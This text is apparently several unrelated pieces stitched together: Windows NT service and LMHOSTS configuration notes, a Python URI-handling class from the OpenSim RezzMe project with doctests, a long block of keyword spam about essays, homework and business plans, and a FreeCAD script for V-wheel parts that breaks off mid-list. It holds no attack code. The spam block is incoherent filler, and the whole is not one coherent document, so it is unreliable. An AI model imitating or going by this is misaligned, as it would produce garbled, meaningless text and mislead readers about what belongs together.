SERVER: Used as the key to all server-sdie NetBIOS applications, this service is somewhat needed. Without this service, some of the administrative tools, such as Server Manager, could not be used. If remote administration or access to the machine is not needed, I highly recommend disabling this service. Contrary to popular belief, this service is NOT needed on a webserver.
SPOOLER: The spooler service is used to accept requests for print jobs from clients, and to allow the local system to spool jobs to a network printer. This service should be set to automatic.
TCP/IP NETBIOS HELPER: This service helps and enhances NBT and the Net Logon service. Because the Net Logon service should be set to automatic, so should this service.
TELEPHONY SERVICE: This service is used to manage telephony drivers and the properties for dialing. On a system that does not use any type of telephony or RAS devices should have this service disabled.
UPS: This service is used in serial communication with an Uninterruptible Power Supply.
WORKSTATION: This service allows for outbound NetBIOS connections. Because it is used in outbound connections only, it is normally not a security risk and should be set to automatic.
Although most security professionals are used to working with a HOSTS file, WindowsNT actually uses two text files to resolve hostnames to their adresses. WindowsNT still uses a HOSTS file, but it also uses an LMHOSTS file.
Much like a HOSTS file, an LMHOSTS is a flat, sequential text file that is used to resolve computer names (NetBIOS) to addresses. The LMHOSTS file also allows one to use keywords, which gives it greater functionality and flexibility than a HOSTS file.
The keywords that the LMHOSTS file uses are #PRE, #DOM:domain, #INCLUDE filename, #BEGIN_ALTERNATE, and #END_ALTERNATE. If something follows a hash mark that is not one of these keywords, it is treated as a remark.
#PRE: If this keyword follows an entry in an LMHOSTS file, it tells WindowsNT to pre-load that entry into the name cache. This allows the windows system to resolve the name much quicker.
#DOM: The #DOM tag entry causes WindowsNT to associate that entry with whatever domain you specify (i.e. #DOM:accounting). This helps NT resolve certain names more efficiently because it does not have to consult routing tables to find out which domain the entry belongs in.
#INCLUDE: This entry tells WindowsNT where to look for other LMHOSTS files that reside on other machines. When using this function, one should specify the UNC path to the other LMHOSTS file. The #BEGIN_ALTERNATE and #END_ALTERNATE are used in conjunction with the #INCLUDE tag and should appear before and after the #INCLUDE tag. |
#!/usr/bin/python
# -*- encoding: utf-8 -*-
# Copyright (c) Contributors, http://opensimulator.org/
# See CONTRIBUTORS.TXT for a full list of copyright holders.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the OpenSim Project nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE DEVELOPERS ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# import logging
import types
import urllib
import RezzMe.parse
import RezzMe.exceptions
class Uri(object):
'''The RezzMe.uri.Uri object encapsulates virtual world resource identifiers.
A virtual world is identified by the hosting server, an
optional user/avatar name and password, an optional region name
with optional X/Y/Z coordinates. In addition RezzMe.uri.Uri
objects can also contain a tag (short label of the target
grid), a display tag (for use in menus), and the identifier of
the virtual world client to use.
'''
def __init__(self, uri = None, display = None, client = None, userId = None):
'''The Uri class encapsulates a RezzMe virtual world resource identifier.
To use RezzMe.Uri you need to import it
>>> import RezzMe.uri
A Uri object can be instantiated in several ways:
- from a string:
>>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com/')
>>> uri.PlainUri
'rezzme://opensim.foobar.com/'
note, that if the URI contains spaces, that they will be converted to '%20':
>>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com/an island')
>>> uri.PlainUri
'rezzme://opensim.foobar.com/an%20island'
- from a dictionary as generated by RezzMe.parse.ParseUriAndPath():
>>> import RezzMe.parse
>>> import RezzMe.uri
>>> uriDict = RezzMe.parse.ParseUriAndPath('rezzme://opensim.foobar.com:9000/island')
>>> uri = RezzMe.uri.Uri(uriDict)
>>> uri.PlainUri
'rezzme://opensim.foobar.com:9000/island'
- from another Uri object (cloning it):
>>> aUri = RezzMe.uri.Uri('rezzme://dr%20who@opensim.foobar.com/region/1/2/3')
>>> anotherUri = RezzMe.uri.Uri(aUri)
>>> anotherUri.Avatar
'dr who'
>>> anotherUri.Avatar = 'mr torchwood'
>>> anotherUri.FullUri
'rezzme://mr%20torchwood@opensim.foobar.com/region/1/2/3'
>>> aUri.FullUri
'rezzme://dr%20who@opensim.foobar.com/region/1/2/3'
here we cloned anotherUri from aUri. aUri had as avatar 'dr who',
which anotherUri inherits (we are cloning aUri). we then change
the avatar value of anotherUri to 'mr torchwood' and retrieve the
FullUri property from both objects: aUri still has 'dr who' as avatar,
anotherUri has 'mr torchwood'.
Additional instantiation parameters are the tag, display,
client, and userId meta data parameters. The tag parameter
is short label of the target grid. The display parameter is
is used to display a Uri in GUI menus. The client parameter
is used to associate a particular virtual world client with
the URI object. The userId parameter finally can associate
a default userId with the Uri object.
Uri objects can also come as auto-login Uri: if avatar name
and password are contained in the Uri *and* the query part
of Uri contains 'auto' as parameter:
>>> autoUri = RezzMe.uri.Uri('rezzme://dr%20who:SECRET@opensim.foobar.com/region/1/2/3?auto')
>>> autoUri.AutoLogin
True
'''
if uri is None:
raise RezzMe.exceptions.RezzMeException('empty uri parameter')
self.__plain = None
self.__http = None
self.__safe = None
self.__auto = False
self.Extensions = {}
if isinstance(uri, str) or isinstance(uri, unicode):
uri = uri.replace(' ', '%20')
self.__dict = {}
self.__orig = uri
self._parse(uri)
elif type(uri) is types.DictType:
self.__dict = uri
self._sync()
self.__orig = self.FullUri
elif isinstance(uri, RezzMe.uri.Uri):
self.__dict = uri.__dict
self._sync()
self.__orig = uri.FullUri
self.Extensions = uri.Extensions
return
else:
raise RezzMe.exceptions.RezzMeException('unexpected uri type %s' % type(uri))
self.Display = display
self.Client = client
self.UserId = userId
# for k in self.__dict:
# logging.debug('uri.Uri: %s -> %s', k, self.__dict[k])
def _sync(self):
self.__plain = '%s://' % self.Scheme
self.__full = self.__plain
self.__safe = self.__plain
if self.Scheme == 'rezzme':
self.__http = 'http://'
else:
self.__http = 'https://'
if 'avatar' in self.__dict:
avatar = urllib.quote(self.__dict['avatar'])
self.__full += avatar
self.__safe += avatar
if 'password' in self.__dict:
self.__full += ':%s' % self.__dict['password']
self.__full += '@'
self.__safe += '@'
self.__plain += self.__dict['host']
self.__http += self.__dict['host']
self.__safe += self.__dict['host']
self.__full += self.__dict['host']
if 'port' in self.__dict:
port = ':%s' % self.__dict['port']
self.__plain += port
self.__http += port
self.__safe += port
self.__full += port
self.__plain += '/'
self.__safe += '/'
self.__full += '/'
self.__base = self.__plain
if 'region' in self.__dict:
self.__plain += self.__dict['region']
self.__safe += self.__dict['region']
self.__full += self.__dict['region']
if 'x' in self.__dict and 'y' in self.__dict and 'z' in self.__dict:
xyz = '/%s' % '/'.join(map(lambda x: str(x), self.XYZ))
self.__safe += xyz
self.__full += xyz
if 'query' in self.__dict:
q = self.__dict['query'].split('&')
self.__auto = 'auto' in q
def _parse(self, uri):
self.__dict = RezzMe.parse.ParseUriAndPath(uri)
if not self.__dict:
raise RezzMe.exceptions.RezzMeException('wonky URI >%s<' % uri)
if not self.Scheme: return None
self._sync()
def _plain(self):
return self.__plain
PlainUri = property(fget = _plain,
doc = '''plain URI without avatar name, avatar password and region X/Y/Z (read-only)
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield@opensim.zurich.ibm.com:9000/island/127/127/24')
>>> uri.PlainUri
'rezzme://opensim.zurich.ibm.com:9000/island'
This is a read-only property, writing to it will result in an exception:
>>> uri.PlainUri = 'rezzme://opensim.zurich.ibm.com:9000/island'
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _base(self):
return self.__base
BaseUri = property(fget = _base,
doc = '''base URI without avatar name, avatar password and region (read-only)
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield@opensim.zurich.ibm.com:9000/island/127/127/24?query')
>>> uri.BaseUri
'rezzme://opensim.zurich.ibm.com:9000/'
This is a read-only property, writing to it will result in an exception:
>>> uri.BaseUri = 'rezzme://opensim.zurich.ibm.com:9000/'
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _safe(self):
return self.__safe
SafeUri = property(fget = _safe,
doc = '''URI without password (read-only)
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield:secret@opensim.zurich.ibm.com:9000/island/127/127/24?query')
>>> uri.FullUri
'rezzme://dr%20scofield:secret@opensim.zurich.ibm.com:9000/island/127/127/24'
>>> uri.SafeUri
'rezzme://dr%20scofield@opensim.zurich.ibm.com:9000/island/127/127/24'
This is a read-only property, writing to it will result in an exception:
>>> uri.SafeUri = 'rezzme://dr%20scofield@opensim.zurich.ibm.com:9000/island/127/127/24'
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _full(self):
return self.__full
FullUri = property(fget = _full,
doc = '''full URI including avatar name and password if available (read-only)
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield:secret@opensim.zurich.ibm.com:9000/island/127/127/24?query')
>>> uri.FullUri
'rezzme://dr%20scofield:secret@opensim.zurich.ibm.com:9000/island/127/127/24'
This is a read-only property, writing to it will result in an exception:
>>> uri.FullUri = 'rezzme://dr%20scofield:secret@opensim.zurich.ibm.com:9000/island/127/127/24'
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _http(self):
return self.__http
BaseHttpUri = property(fget = _http,
doc = '''base HTTP URI of the server (without trailing "/") (read-only)
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield:secret@opensim.zurich.ibm.com:9000/island/127/127/24?query')
>>> uri.BaseHttpUri
'http://opensim.zurich.ibm.com:9000'
This is a read-only property, writing to it will result in an exception:
>>> uri.BaseHttpUri = 'http://opensim.zurich.ibm.com:9000'
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _keyValue(self, key):
if type(key) is types.StringType:
if key in self.__dict: return self.__dict[key]
elif type(key) is types.ListType:
return [self.__dict[x] if x in self.__dict else None for x in key]
return None
def _credentials(self):
return self._keyValue(['avatar', 'password'])
def _scredentials(self, value):
if value[0] is None and 'avatar' in self.__dict:
del self.__dict['avatar']
else:
if len(value[0].split()) != 2:
raise RezzMe.exceptions.RezzMeException('avatar name format violation, must be "First Last", found "%s"' % value[0])
self.__dict['avatar'] = value[0]
if value[1] is None and 'password' in self.__dict:
del self.__dict['password']
else:
self.__dict['password'] = value[1]
self._sync()
Credentials = property(fget = _credentials, fset = _scredentials,
doc = '''tuple containing (avatar name, password) (read-write)
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield:secret@opensim.zurich.ibm.com:9000/island/127/127/24?query')
>>> uri.Credentials
['dr scofield', 'secret']
This is a read-write property:
>>> uri.Credentials = ['dr who', 'anothersecret']
>>> uri.Credentials
['dr who', 'anothersecret']
Note, that, as with RezzMe.parse, the avatar name has to follow
the format "First Last"; this will fail:
>>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com/island')
>>> uri.Credentials = ['drwho', 'secret']
Traceback (most recent call last):
...
RezzMeException: avatar name format violation, must be "First Last", found "drwho"
''')
def _avatar(self):
return self._keyValue('avatar')
def _savatar(self, value):
if value is None and 'avatar' in self.__dict:
del self.__dict['avatar']
else:
if len(value.split()) != 2:
raise RezzMe.exceptions.RezzMeException('avatar name format violation, must be "First Last", found "%s"' % value)
self.__dict['avatar'] = value
self._sync()
Avatar = property(fget = _avatar, fset = _savatar,
doc = '''avatar name (read-write)
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield@opensim.foobar.com/island')
>>> uri.Avatar
'dr scofield'
As this is a read-write property you can set the avatar name as well:
>>> uri.Avatar = 'dr who'
>>> uri.Avatar
'dr who'
Again, the avatar name has to follow the "First Last" pattern, this will fail:
>>> uri.Avatar = 'drwho'
Traceback (most recent call last):
...
RezzMeException: avatar name format violation, must be "First Last", found "drwho"
''')
def _client(self):
return self._keyValue('client')
def _sclient(self, value):
if value is None and 'client' in self.__dict:
del self.__dict['client']
else:
self.__dict['client'] = value
Client = property(fget = _client, fset = _sclient,
doc = '''client to use (read-write)
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield@opensim.foobar.com/island')
>>> uri.Client
>>> uri.Client = '/opt/SL/secondlife/secondlife-1.22.11.113941/secondlife'
>>> uri.Client
'/opt/SL/secondlife/secondlife-1.22.11.113941/secondlife'
''')
def _password(self):
return self._keyValue('password')
def _spassword(self, value):
if value is None and 'password' in self.__dict:
del self.__dict['password']
else:
self.__dict['password'] = value
self._sync()
Password = property(fget = _password, fset = _spassword,
doc = '''avatar password (read-write)
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield@opensim.foobar.com/island')
>>> uri.Credentials
['dr scofield', None]
>>> uri.Password
>>> uri.Password = 'secret'
>>> uri.Password
'secret'
Setting the password has an effect on Credentials and on FullUri:
>>> uri.Credentials
['dr scofield', 'secret']
>>> uri.FullUri
'rezzme://dr%20scofield:secret@opensim.foobar.com/island'
''')
def _fullyQualified(self):
return all((self.Avatar, self.Password))
FullyQualified =property(fget = _fullyQualified,
doc = '''True if this uri object contains both avatar name and password
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield:SECRET@opensim.foobar.com/island')
>>> uri.FullyQualified
True
but:
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield@opensim.foobar.com/island')
>>> uri.FullyQualified
False
''')
def _autoLogin(self):
return self.__auto and self.FullyQualified
AutoLogin = property(fget = _autoLogin,
doc = '''True if this uri object is a auto-login Uri.
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield:SECRET@opensim.foobar.com/island?auto')
>>> uri.AutoLogin
True
but:
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield@opensim.foobar.com/island?auto')
>>> uri.AutoLogin
False
''')
def _userId(self):
return self._keyValue('userID')
def _suserId(self, value):
if value is None and 'userID' in self.__dict:
del self.__dict['userID']
else:
self.__dict['userID'] = value
UserId = property(fget = _userId, fset = _suserId,
doc = '''user ID in case of authenticated grid (read-write)
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield@opensim.foobar.com/island')
>>> uri.UserId
>>> uri.UserId = 'drscofield@xyzzyxyzzy.net'
>>> uri.UserId
'drscofield@xyzzyxyzzy.net'
UserId is a pure meta property in that it has no effect on other properties such as FullUri:
>>> uri.FullUri
'rezzme://dr%20scofield@opensim.foobar.com/island'
''')
def _display(self):
display = self._keyValue('display')
if not display:
display = ''
if self.Avatar:
display += '%s@' % self.Avatar
if self.Port:
display += 'rezzme://%s:%s' % (self.Host, self.Port)
else:
display += 'rezzme://%s' % self.Host
if self.Path:
display += '/%s' % self.Path
self.Display = display
return display
def _sdisplay(self, value):
if value is None and 'display' in self.__dict:
del self.__dict['display']
else:
self.__dict['display'] = value
self._sync()
Display = property(fget = _display, fset = _sdisplay,
doc = '''string that can be used in menus and so forth (read-write)
Unless explicitly set, the Display property will return a default value
constructed from other properties of the Uri object:
>>> uri = RezzMe.uri.Uri('rezzme://dr%20scofield@opensim.foobar.com/island')
>>> uri.Display
'dr scofield@rezzme://opensim.foobar.com/island'
Once set, Display will return that value instead:
>>> uri.Display = 'foobar island'
>>> uri.Display
'foobar island'
Even if we change another property that the default value of Display would use,
we still get the explicitly-set value:
>>> uri.Avatar = 'dr who'
>>> uri.Display
'foobar island'
''')
def _scheme(self):
return self._keyValue('scheme')
Scheme = property(fget = _scheme,
doc = '''URI scheme (read-only)
Usually returns "rezzme":
>>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com:9000/island/1/2/3')
>>> uri.Scheme
'rezzme'
or "rezzmes":
>>> uri = RezzMe.uri.Uri('rezzmes://opensim.foobar.com:9000/island/1/2/3')
>>> uri.Scheme
'rezzmes'
Note, that this is a read-only property, setting it will raise an exception:
>>> uri.Scheme = 'http'
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _port(self):
return self._keyValue('port')
Port = property(fget = _port,
doc = '''URI port (if specified) (read-only)
Example with port provided:
>>> uri = RezzMe.uri.Uri('rezzmes://opensim.foobar.com:9000/island/1/2/3?query')
>>> uri.Port
'9000'
Example without port:
>>> uri = RezzMe.uri.Uri('rezzmes://opensim.foobar.com/island/1/2/3?query')
>>> uri.Port
Note, that Port is a read-only property; setting it will raise an exception:
>>> uri.Port = 4000
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _host(self):
return self._keyValue('host')
Host = property(fget = _host,
doc = '''URI host (read-only)
Sample code:
>>> uri = RezzMe.uri.Uri('rezzmes://opensim.foobar.com/island/1/2/3?query')
>>> uri.Host
'opensim.foobar.com'
Note, that Host is a read-only property; setting it will raise an exception:
>>> uri.Host = 'opensim.foo.bar.com'
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _region(self):
return self._keyValue('region')
Region = property(fget = _region,
doc = '''URI region (if specified) (read-only)
Sample code:
>>> uri = RezzMe.uri.Uri('rezzmes://opensim.foobar.com/island/1/2/3?query')
>>> uri.Region
'island'
Note, that Region is a read-only property; setting it will raise an exception:
>>> uri.Host = 'wonderland'
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _decodedRegion(self):
return urllib.unquote(self._keyValue('region'))
DecodedRegion = property(fget = _decodedRegion,
doc = '''Decoded URI region (if specified) (read-only)
Sample code:
>>> uri = RezzMe.uri.Uri('rezzmes://opensim.foobar.com/island/1/2/3?query')
>>> uri.DecodedRegion
'island'
but:
>>> uri = RezzMe.uri.Uri('rezzmes://opensim.foobar.com/treasure%20island/1/2/3?query')
>>> uri.DecodedRegion
'treasure island'
Note, that Region is a read-only property; setting it will raise an exception:
>>> uri.Host = 'wonderland'
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _xyz(self):
return self._keyValue(['x', 'y', 'z'])
XYZ = property(fget = _xyz,
doc = '''tuple containing (X, Y, Z) coordinates (if specified) (read-only)
Sample code:
>>> uri = RezzMe.uri.Uri('rezzmes://opensim.foobar.com/island/1/2/3?query')
>>> uri.XYZ
[1, 2, 3]
Note, that XYZ is a read-only property; setting it will raise an exception:
>>> uri.XYZ = [4, 5, 6]
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _location(self):
if self.Region and all(self.XYZ):
return 'secondlife://%s/%s' % (self.Region, '/'.join([str(x) for x in self.XYZ])) # map(lambda x: str(x), self.XYZ)))
elif self.Region:
return 'secondlife://%s' % self.Region
else:
return None
Location = property(fget = _location,
doc = '''location with in the target grid as a secondlife:// URI (read-only)
Sample code:
>>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com/island/1/2/3')
>>> uri.Location
'secondlife://island/1/2/3'
or:
>>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com/wonder%20land/1/2/3')
>>> uri.Location
'secondlife://wonder%20land/1/2/3'
Note, that without a region we will get a None as return value:
>>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com/')
>>> uri.Location
Finally, Location is a read-only property; setting it will raise an exception:
>>> uri.Location = 'secondlife://myland/1/2/3'
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _path(self):
return self._keyValue('path')
Path = property(fget = _path,
doc = '''URI region(X/Y/Z)? component (if available) (read-only)
Sample code:
>>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com/myland/127/128/33')
>>> uri.Path
'myland/127/128/33'
but also:
>>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com/')
>>> uri.Path
Note, Path is a read-only property; setting it will raise an exception:
>>> uri.Path = 'yourland/127/126/32'
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _query(self):
return self._keyValue('query')
Query = property(fget = _query,
doc = '''URI query component (if available)
Sample code:
>>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com/myland/127/128/33?query&p0=a&p1=b')
>>> uri.Query
'query&p0=a&p1=b'
but also:
>>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com/myland/127/128/33')
>>> uri.Query
Note, Query is a read-only property; setting it will raise an exception:
>>> uri.Query = 'query&p0=x&p1=y'
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def _dict(self):
return self.__dict
Dict = property(fget = _dict,
doc = '''returns dictionary with all recognized components (read-only)
Sample code:
>>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com/myland/127/128/33')
>>> uri.Dict
{'z': 33, 'plain': 'rezzme://opensim.foobar.com', 'region': 'myland', 'userID': None, 'slurl': 'secondlife:///myland/127/128/33', 'host': 'opensim.foobar.com', 'client': None, 'x': 127, 'y': 128, 'path': 'myland/127/128/33', 'scheme': 'rezzme', 'display': None}
Note, Dict is a read-only property; setting it will raise an exception:
>>> uri.Dict = {'z': 33, 'plain': 'rezzme://opensim.foobar.com', 'region': 'myland', 'userID': None, 'slurl': 'secondlife:///myland/127/128/33', 'host': 'opensim.foobar.com', 'client': None, 'x': 127, 'y': 128, 'path': 'yourland', 'scheme': 'rezzme', 'display': None}
Traceback (most recent call last):
...
AttributeError: can't set attribute
''') #'
def __cmp__(self, other):
'''Override the comparison method and compare on FullUri:
Sample code:
>>> uri0 = RezzMe.uri.Uri('rezzme://opensim.foobar.com/myland/127/128/33')
>>> uri1 = RezzMe.uri.Uri('rezzme://opensim.foobar.com/myland/127/128/33')
>>> uri0 == uri1
True
and:
>>> uri0 = RezzMe.uri.Uri('rezzme://opensim.foobar.com/myland/127/128/33')
>>> uri1 = RezzMe.uri.Uri('rezzme://opensim.foobar.com/myland/127/128/3')
>>> uri0 == uri1
False
As this will only compare on FullUri, meta properties will not be taken into
account:
>>> uri0 = RezzMe.uri.Uri('rezzme://opensim.foobar.com/myland/127/128/33')
>>> uri1 = RezzMe.uri.Uri('rezzme://opensim.foobar.com/myland/127/128/33')
>>> uri0 == uri1
True
'''
return cmp(self.FullUri, other.FullUri)
def __hash__(self):
'''Override the hash method to use __hash__ of FullUri instead.
>>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com/')
>>> uri.__hash__()
-968694205
'''
return self.FullUri.__hash__()
def __str__(self):
'''Override the str representation method and return all relevant properties.
Sample code:
>>> uri = RezzMe.uri.Uri('rezzme://opensim.foobar.com/')
>>> str(uri)
'rezzme://opensim.foobar.com/ client: None/userId: None/display: rezzme://opensim.foobar.com'
Adding meta property values:
>>> uri.Client = '/path/to/client'
>>> str(uri)
'rezzme://opensim.foobar.com/ client: /path/to/client/userId: None/display: rezzme://opensim.foobar.com'
>>> uri.UserId = 'drscofield@foobar.com'
>>> str(uri)
'rezzme://opensim.foobar.com/ client: /path/to/client/userId: drscofield@foobar.com/display: rezzme://opensim.foobar.com'
'''
return '%s client: %s/userId: %s/display: %s' % (self.FullUri, self.Client, self.UserId, self.Display)
|
Treatment of malaria essay topic sentences for argumentative essays pope an essay on criticism pdf how to write a history essay university sat essay paper template critical essays on robert frost, my research paper is really bad.
Turnitin assignment meaning how to write a research paper in an hour interview, mock research proposal example tok essays examples 2017 clinic business plan sample allegory of the cave essay literary analysis business plan executive summary templates adaptive techniques for problem solving what is an abstract in a research paper example herbalife business plan 2018 in hindi 6th grade math problem solving greatest common factor and least common multiple how to make a business plan outline math homework 6th grade run on sentence. Introduction for an essay on major cleaning business plan template movie essay topics, cheap essay writer reviews how to write a persuasive paper on recycling photo prompts for creative writing software, importance of homework in schools.
Pay for essays online payment problem solving kids scale real estate investing business plan examples essay examples outlines water bottling plant business plan my research paper is really bad argumentative essay about the holocaust business research proposal sample in entrepreneurship business plan for smoothie bar need help on workers comp claim homework doesn t help.
Opinion writing paper lucy calkins how to make an appendix for research paper. Samples on how to write a business plan.
Play school business plan in tamil 2nd grade math homework ideas globalization pros and cons essay ielts problem solving group creative writers needed, order of operations problem solving, art research paper title page formatting a research paper in apa style.
Future problem solving program international international conference 2015 influential person college essay example. Proper essay format proposed research project examples how to start a conclusion paragraph for an essay proper essay format sample research paper outline for middle school essay on feminism in america good things to write an college essay about concession trailer business plan template. Welfare research papers small livestock business plan how to write a university assignment pdf a manual for writers of term papers the ses and dissertation ipad pro best app for homework. Practice essay writing topics research paper acknowledgement example free examples of research essays sample essays for scholarships personal statement. Arthur engel problem solving strategies california algebra 1 concepts skills and problem solving worksheets business plan for school districts essay comprehension & letter writing english holiday homework for grade 1.
Photo prompts for creative writing software free business plan for a small business business plan for voip assessment brief definition dissertation masters analyze diction tone writing introduction of assignment term paper on economics of paper assign risk solutions how to plan an essay examples sample argumentative essay rubric middle school fha case number assignment date. How to write an essay about poem analysis problem solving activities for training, emotional intelligence assignment templates for kindergarten homework folders, write a short essay about yourself edu answers to homework questions for free ela, examples of 8 steps to problem solving.
Television production business plan essays on why minimum wage should be raised problem solving techniques in management pdf fictional narrative essay ideas apa 6th edition sample research paper format research paper on water scarcity sample research proposals for phd programs essay on frederick douglass narrative college scholarships with no essays examples of a good dissertation nedbank business plans citation essay in a bookSample leadership essay for national honor society agro tourism business plan restaurant business plan template pdf writing a college essay outline solar farm business plan pdf download home health care agency business plan sample essay body language communication good thesis statement for research papers write abstract for research paper essays on character development, main parts of a research paper.
Outsource business plan examples writing a briefing paper template cat essay writer examples, homework is unnecessary. Buy assignments online uke write abstract for research paper clinic business plan sample research paper on water scarcity kindergarten math problem-solving images.
5 paragraph essay on the holocaust example of a profile essay of a person writing a argumentative essay mobile food cart business plan template critical thinking an introduction alec fisher statistical treatment of data research paper writing an essay for college placement test lunch truck business plan free process essay sample.
Critical essays on robert frost website to type your essay.
Youth work training courses 2017 problem solving multiplication and division worksheets pdf sample research paper abstracts solving volume problems florida testing great writing 4 great essays code.
Research paper front page example research paper presentation ideas best business plan writing services critical thinking community website sample 8th grade essay prompts funny homework pictures ideas what is an abstract in a research paper example essays on the law of nature auto restoration business plan essay on christmas day in english clinical problem solving internal medicine format for an argumentative essay conclusion asian homework vine images machine learning homework critical thinking is defined asmr expository essay leads.
Writing a dissertation abstract write descriptive essay about bahir dar. Nuclear power research papers creative writing career write abstract for research paper 200 words essay on winter season how to write a film essay ncea good informative research paper topics car accident essay examples.
Good informative research paper topics topics for opinion essays for kids 150 words essay on discipline 150 words essay on discipline write abstract for research paper research paper topics on nutrition health argumentative essay internet privacy civil engineering dissertations pdf political science topics for research paper template term paper examples for health four lines english writing paper free business plan for voip do the right thing essay example free mobile bbq business plan different essay forms national essay contest high school expository essay leads, sexism essay titles research proposal memorial essay on personality of allama iqbal in english business continuity plan and disaster recovery plan worksheet effects of social media to students research paper, essays about respecting teachers a list of transitional words for research papers research papers on nature vs nurture homework printables sample personal essay about yourself essay on waiting for superman problem solving practice numerical expression dbq essay examples apush nursing literature review example apa review of literature on financial statement analysis pdf adult psychotherapy homework planner anxiety.
Joan collins homework trailers template for a research paper great homework excuses freedom of religion amendment essay problem solving using computers example of dissertation research paper format tagalog. |
# **************************************************************************************
# * *
# * BOLTS - Open Library of Technical Specifications *
# * *
# * Copyright (C) 2014 Johannes Reinhardt <jreinhardt@ist-dein-freund.de> *
# * *
# * This library is free software; you can redistribute it and/or *
# * modify it under the terms of the GNU Lesser General Public *
# * License as published by the Free Software Foundation; either *
# * version 2.1 of the License, or any later version. *
# * *
# * This library is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *
# * Lesser General Public License for more details. *
# * *
# * You should have received a copy of the GNU Lesser General Public *
# * License along with this library; if not, write to the Free Software *
# * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA *
# * *
# **************************************************************************************
import Part
from FreeCAD import Vector
from Part import makeLine
def dualvwheel(params, document):
# no params
name = params["name"]
# still name some quantities
r_1 = 0.5 * 13.89
r_2 = 0.5 * 15.974
r_3 = 9.77
r_4 = 0.5 * 18.75
r_5 = 0.5 * 24.39
# profile for revolution is symmetric, therefore only points from right half
vertices = [
(0, r_1, 0),
(0.5, r_1, 0),
(0.5, r_2, 0),
(0.5 * 10.23 - 0.3, r_2, 0),
(0.5 * 10.23, r_2 + 0.3, 0),
(0.5 * 10.23, r_3, 0),
(0.5 * (10.23 - 4.84), r_5, 0),
(0.5 * (10.23) - 4.84, r_3, 0),
(0.5 * (10.23) - 4.84, r_4, 0),
(0, r_4, 0)
]
lines = []
vlast = None
vcur = Vector(vertices[0])
# right half
for i in range(1, len(vertices)):
vlast = vcur
vcur = Vector(vertices[i])
lines.append(makeLine(vcur, vlast))
# left half
for i in range(len(vertices) - 2, -1, -1):
vlast = vcur
vcur = Vector(vertices[i])
vcur[0] *= -1
lines.append(makeLine(vcur, vlast))
part = document.addObject("Part::Feature", "BOLTS_part")
part.Label = name
part.Shape = Part.Face(
Part.Wire(lines)
).revolve(Vector(0, 0, 0), Vector(1, 0, 0), 360).removeSplitter()
def solidvwheel(params, document):
# no params
name = params["name"]
# still name some quantities
r_1 = 0.5 * 13.89
r_2 = 0.5 * 15.974
r_3 = 9.77
r_4 = 0.5 * 23.89
# profile for revolution is symmetric, therefore only points from right half
vertices = [
(0, r_1, 0),
